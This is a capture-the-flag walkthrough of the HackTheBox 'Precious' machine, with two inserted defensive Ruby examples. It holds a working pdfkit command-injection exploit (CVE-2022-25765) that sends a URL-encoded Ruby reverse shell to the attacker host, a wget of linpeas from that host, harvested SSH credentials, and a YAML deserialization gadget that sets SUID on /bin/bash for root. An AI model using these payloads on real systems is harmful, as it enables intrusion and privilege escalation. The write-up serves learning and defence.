Precious

TARGET IP: 10.10.11.189
HOST IP: 10.10.16.10
Recon
NMAP
nmap [Target IP]
nmap -A -p 22,80 [Target IP]
HTTP
First, map the hostname to the target IP address by adding an entry to the hosts file.
echo "[TARGET IP] precious.htb" | sudo tee -a /etc/hosts


I tried adding a URL to see what happens, but it looks like it does not have web access to view the page.

I tried http://precious.htb/ and that still didn't work.

It does look like it will return credentials depending on what you put in.
Enumeration
Gobuster
gobuster dir -u http://precious.htb/ -w /usr/share/dirb/wordlists/common.txt
Exploit
It looks like none of my notes from last night got saved for some stupid fucking reason. I need to learn how to better use this fucking site or this is going to drive me fucking nuts.
Long story, but I created different file extension payloads. It seems like the machine filters out .php and .rb file extensions and will make a PDF file of any other file type I load into it.
I did this by starting up a Python web server on my host machine, plugging the URL into the input box on the web server, and opening up a netcat listener to see if I could get something to stick.
I'm still not positive on the backend code being used but am making the assumption that it is either php or ruby.
JAVA
I started trying out Java reverse shells and got something interesting when I used a Java one-liner with the file extension .xml.

PDF
I finally downloaded one of the pdfs that I created and opened it in exiftool to take a look at the properties.
exiftool [PDF File Path]
It looks like the Creator's name is pdfkit v0.8.6.
Let's go take a look at how I can possibly exploit this.
CVE-2022-25765
Looks like this tool has a vulnerability that allows for Command Injection. Let's see if we can exploit this.
Set up a netcat listener:
nc -lvnp 4444
I found a tool on GitHub that uses a curl command and forms a reverse shell that exploits the vulnerability.
curl '[TARGET URL]' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: [TARGET URL]' -H 'Connection: keep-alive' -H 'Referer: [TARGET URL]' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F[HOST IP]%3A[HOST PORT]%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22[HOST IP]%22%2C[HOST PORT]%29%29%27%60'
The data being sent is a URL-encoded Ruby reverse shell that connects back to the netcat listener I have set up.
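A defender-side check for the request shape above, added here as an example and not taken from the writeup or from pdfkit: it decodes the url form field once (as the application sees it) and flags shell metacharacters in it, with a second percent-decode to catch double-encoded variants. The request bodies and the 192.0.2.10 address are constructed, and the function names are my own.

```ruby
require "uri"
require "cgi"

# Shell metacharacters that should never appear in a URL that ends up on a
# command line: backtick, $(, pipe, newline.
SHELL_META = /[`|\n]|\$\(/

# Pull the "url" field out of an application/x-www-form-urlencoded body,
# decoded once, the way the web application itself would see it.
def url_param(form_body)
  URI.decode_www_form(form_body).to_h["url"]
end

# True when the submitted URL carries a shell metacharacter, either directly
# or after one more round of percent-decoding (catches %2560-style variants).
def suspicious_pdfkit_url?(form_body)
  url = url_param(form_body)
  return false if url.nil?
  [url, CGI.unescape(url)].any? { |u| u.match?(SHELL_META) }
end

# Constructed sample bodies (not captured from the target); 192.0.2.10 is a
# placeholder address and the command between the backticks is just "true".
BENIGN_BODY  = "url=https%3A%2F%2Fexample.com%2Fpage%3Fq%3Dhello%2520world"
EXPLOIT_BODY = "url=http%3A%2F%2F192.0.2.10%3A8000%2F%3Fname%3D%2520%60true%60"

# Scan a batch of bodies and return the indexes of the suspicious ones,
# which is what you would hand to an alert.
def flag_bodies(bodies)
  bodies.each_index.select { |i| suspicious_pdfkit_url?(bodies[i]) }
end

if __FILE__ == $0
  puts flag_bodies([BENIGN_BODY, EXPLOIT_BODY]).inspect
end
```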

Let's get a more interactive shell to work with.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
^Z
Back on the host machine, in the same terminal, run the following (what you type will not echo until the shell comes back to the foreground):
stty raw -echo; fg
Let's go look for the user flag.
find / -name user.txt 2>/dev/null
Looks like the file is unreadable due to permissions. Let's see what we can do about that.
I now know we have at least 3 users on the system:
henry
ruby
root
We can confirm this in the /etc/passwd file.

I tried sudo -l but needed a password to use it. I also spent some time digging around to try to find some other useful information. In the end, I went ahead and uploaded linpeas and ran that to see what was available.
I used the same Python web server I already had running.
wget http://[HOST IP]:8000/linpeas.sh
./linpeas.sh
I wasn't getting anywhere there, so I started browsing around a bit more. In /home/ruby/.bundle/config I found some juicy info.

Looks like possible credentials for henry:
henry:Q3c1AqGHtoI0aXAYFH
I'll now SSH into the machine with henry's credentials, and it works.
ssh henry@[Target IP]
Now let's get that user file.

0d534cd692f6860abfeb9af4ba3c4e92
Next step is to see what privileges I have as henry.
sudo -l
We have sudo privileges to run the update_dependencies.rb file. If we cat that file, we can see that it reads a dependencies.yml file.

# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
  YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
  Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
  gems_local.each do |local_name, local_version|
    if(file_name == local_name)
      if(file_version != local_version)
        puts "Installed version differs from the one specified in file: " + local_name
      else
        puts "Installed version is equals to the one specified in file: " + local_name
      end
    end
  end
end
With this information, we should be able to craft a new dependencies.yml file with malicious content that the script will load as root. Two details make this work: the script reads "dependencies.yml" as a relative path, so it picks up whatever file sits in the directory we run it from, and it parses it with YAML.load, which will instantiate arbitrary Ruby objects from tagged YAML.
In the /home/henry directory we will create a new dependencies.yml file and use this code snippet I got online.
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve
You'll notice that git_set is set to chmod +s /bin/bash. This sets the SUID bit on that file, which means we should be able to use it to escalate our privileges.
In the same directory where you created the dependencies.yml file, run the following:
sudo /usr/bin/ruby /opt/update_dependencies.rb
This will execute the file and end up changing the permissions on /bin/bash. After this is done, we can use a privilege escalation technique from GTFOBins to escalate our privileges.
/bin/bash -p
Check who you are with whoami and you should now be root.
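A hardened version of the dependency check, added here as an example and not the box's own script: it uses YAML.safe_load so object tags are refused, validates that the document is a plain name-to-version mapping, and reads the file from a fixed path next to the script instead of the caller's working directory, removing both conditions the escalation above relies on. The sample documents are constructed, and safe_list_from_string, compare_versions and tagged_yaml_rejected? are names I chose.

```ruby
require "yaml"

# Hardened replacement for list_from_file: safe_load only builds strings,
# numbers, arrays and hashes, so a tag such as !ruby/object:Gem::Requirement
# raises Psych::DisallowedClass instead of instantiating that class.
def safe_list_from_string(yaml_text)
  data = YAML.safe_load(yaml_text)
  raise ArgumentError, "expected a mapping of gem name to version" unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && version.is_a?(String)
      raise ArgumentError, "bad entry #{name.inspect} => #{version.inspect}"
    end
  end
  data
end

# Read the list from a fixed location next to the script rather than from the
# current directory, so running it from /home/henry cannot swap in another file.
def safe_list_from_file(path = File.join(__dir__, "dependencies.yml"))
  safe_list_from_string(File.read(path))
end

# Same comparison the script performs, returning results instead of printing them.
def compare_versions(gems_file, gems_local)
  gems_file.filter_map do |name, file_version|
    local = gems_local.find { |local_name, _| local_name == name }
    next unless local
    [name, file_version == local[1] ? :same : :differs]
  end
end

# True when safe_load refuses the document because of an object tag.
def tagged_yaml_rejected?(yaml_text)
  safe_list_from_string(yaml_text)
  false
rescue Psych::DisallowedClass
  true
end

# Constructed sample inputs (not files from the box). Versions are quoted so
# safe_load keeps them as strings rather than parsing "1.0" as a float.
BENIGN_YAML = <<~YAML
  ---
  yaml: "0.1.1"
  pdfkit: "0.8.6"
YAML

# Same shape as the writeup's dependencies.yml, but a harmless class and no gadget chain.
TAGGED_YAML = <<~YAML
  ---
  - !ruby/object:Gem::Requirement
    requirements: x
YAML
```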

cat /root/root.txt
7090f28f7bc0ffc0a8b3203bd45ff6ac